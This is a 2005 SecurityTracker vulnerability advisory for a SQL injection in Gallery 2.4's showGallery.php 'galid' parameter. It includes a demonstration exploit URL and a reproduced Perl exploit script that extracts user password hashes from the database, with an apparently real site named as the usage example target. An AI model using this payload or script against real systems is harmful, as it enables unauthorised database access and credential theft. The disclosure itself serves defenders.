SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Gallery Vendors:   Gallery Project
Gallery 'showGallery.php' Input Validation Hole in 'galid' Parameter Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1015162
SecurityTracker URL:  http://securitytracker.com/id/1015162
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 7 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 2.4
Description:   A vulnerability was reported in Gallery. A remote user can inject SQL commands.

The 'showGallery.php' script does not properly validate user-supplied input in the 'galid' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=[id number]/*

ABDUCTER_MINDS reported this vulnerability.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  gallery.menalto.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Gallery_v2.4 SQL Injection

#!/bin/env perl
#------------------------------------------------------------#
#-	Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS@S4A.CC) OR (ABDUCTER_MINDS@YAHOO.COM)
#-	[!]	==|| Gallery_v2.4 SQL Injection ||==
#-		Gr33tz :-                                                              
#-			N0N0 (MY LOVE)															 
#-			WWW.S4A.CC  
#-			Devil-00               
#-			FOR ALL ARABIAN COUNTRIES 															  
#------------------------------------------------------------#
use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for Gallery_v2.4	               ";
print "\n=   BY    |(ABDUCTER_MINDS[at]YAHOO.COM)|     ";	          		
print "\n=             FOR ALL ARAB WWW.S4A.CC         ";			
print "\n============================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
  print "\n==|| Warning ABDUCTER Behind U ||==";	
  print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";
  exit(0);
}
$url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC